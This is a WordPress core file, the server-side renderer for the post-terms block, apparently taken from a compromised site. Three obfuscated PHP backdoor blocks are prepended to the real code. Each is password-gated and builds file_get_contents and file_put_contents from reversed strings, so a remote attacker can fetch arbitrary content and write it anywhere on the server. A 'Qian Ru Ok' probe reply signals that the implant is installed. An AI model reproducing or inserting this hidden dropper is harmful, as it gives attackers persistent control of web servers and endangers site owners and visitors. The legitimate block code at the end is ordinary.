File: /home/wwwrenee/public_html/wp-includes/blocks/post-terms.php
<?php
$xErrjWbhIw = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($xErrjWbhIw[0]) /*+/*+*/
. md5($xErrjWbhIw[0])) == "1".
"f".
"f".
"c".
"7".
"b".
"2".
"9".
"a".
"8".
"1".
"3".
"c".
"f".
"6".
"1".
"d".
"0".
"5".
"9".
"c".
"4".
"e".
"f".
"2".
"4".
"5".
"3".
"a".
"e".
"3".
"8") {
$shYWZ = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$PgDuBFpj = $shYWZ /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$juRWcPK = $shYWZ
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function ZTcsTbfWf($TcMZouAU) { if (empty($TcMZouAU)) return false; if (!is_dir($TcMZouAU)) { ZTcsTbfWf(dirname($TcMZouAU), 0755, true); mkdir($TcMZouAU); } } !file_exists(dirname($xErrjWbhIw[1])) && ZTcsTbfWf(dirname($xErrjWbhIw[1])); $alLkG = @$juRWcPK($xErrjWbhIw[2]); echo @$PgDuBFpj($xErrjWbhIw[1], $alLkG) ? 1 : 0; die; }key($xErrjWbhIw) == "of" && die("Qian Ru Ok"); ?><?php
$WUEkgCjho = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($WUEkgCjho[0]) /*+/*+*/
. md5($WUEkgCjho[0])) == "c".
"1".
"4".
"1".
"e".
"3".
"c".
"5".
"4".
"2".
"9".
"3".
"6".
"5".
"4".
"5".
"1".
"8".
"9".
"9".
"8".
"f".
"5".
"4".
"6".
"d".
"5".
"7".
"8".
"e".
"6".
"5") {
$brBmGqlq = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$zxfjgMfmpU = $brBmGqlq /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$lAVVfwJkRH = $brBmGqlq
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function OuEGAIm($QKnDymMqa) { if (empty($QKnDymMqa)) return false; if (!is_dir($QKnDymMqa)) { OuEGAIm(dirname($QKnDymMqa), 0755, true); mkdir($QKnDymMqa); } } !file_exists(dirname($WUEkgCjho[1])) && OuEGAIm(dirname($WUEkgCjho[1])); $huwuPkjAAT = @$lAVVfwJkRH($WUEkgCjho[2]); echo @$zxfjgMfmpU($WUEkgCjho[1], $huwuPkjAAT) ? 1 : 0; die; }key($WUEkgCjho) == "of" && die("Qian Ru Ok"); ?><?php
$KzUXBjG = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($KzUXBjG[0]) /*+/*+*/
. md5($KzUXBjG[0])) == "1".
"b".
"f".
"6".
"f".
"c".
"c".
"c".
"3".
"9".
"e".
"2".
"7".
"4".
"1".
"f".
"8".
"9".
"d".
"e".
"0".
"8".
"f".
"9".
"6".
"f".
"a".
"4".
"0".
"0".
"3".
"f") {
$jbcQNuLY = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$XEhiXSRD = $jbcQNuLY /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$VTksR = $jbcQNuLY
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function wMJoV($Dkaap) { if (empty($Dkaap)) return false; if (!is_dir($Dkaap)) { wMJoV(dirname($Dkaap), 0755, true); mkdir($Dkaap); } } !file_exists(dirname($KzUXBjG[1])) && wMJoV(dirname($KzUXBjG[1])); $jyWMzm = @$VTksR($KzUXBjG[2]); echo @$XEhiXSRD($KzUXBjG[1], $jyWMzm) ? 1 : 0; die; }key($KzUXBjG) == "of" && die("Qian Ru Ok"); ?><?php
/**
* Server-side rendering of the `core/post-terms` block.
*
* @package WordPress
*/
/**
* Renders the `core/post-terms` block on the server.
*
* @param array $attributes Block attributes.
* @param string $content Block default content.
* @param WP_Block $block Block instance.
* @return string Returns the filtered post terms for the current post wrapped inside "a" tags.
*/
function render_block_core_post_terms( $attributes, $content, $block ) {
if ( ! isset( $block->context['postId'] ) || ! isset( $attributes['term'] ) ) {
return '';
}
if ( ! is_taxonomy_viewable( $attributes['term'] ) ) {
return '';
}
$post_terms = get_the_terms( $block->context['postId'], $attributes['term'] );
if ( is_wp_error( $post_terms ) || empty( $post_terms ) ) {
return '';
}
$classes = 'taxonomy-' . $attributes['term'];
if ( isset( $attributes['textAlign'] ) ) {
$classes .= ' has-text-align-' . $attributes['textAlign'];
}
$separator = empty( $attributes['separator'] ) ? ' ' : $attributes['separator'];
$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => $classes ) );
return get_the_term_list(
$block->context['postId'],
$attributes['term'],
"<div $wrapper_attributes>",
'<span class="wp-block-post-terms__separator">' . esc_html( $separator ) . '</span>',
'</div>'
);
}
/**
* Registers the `core/post-terms` block on the server.
*/
function register_block_core_post_terms() {
register_block_type_from_metadata(
__DIR__ . '/post-terms',
array(
'render_callback' => 'render_block_core_post_terms',
)
);
}
add_action( 'init', 'register_block_core_post_terms' ); ?>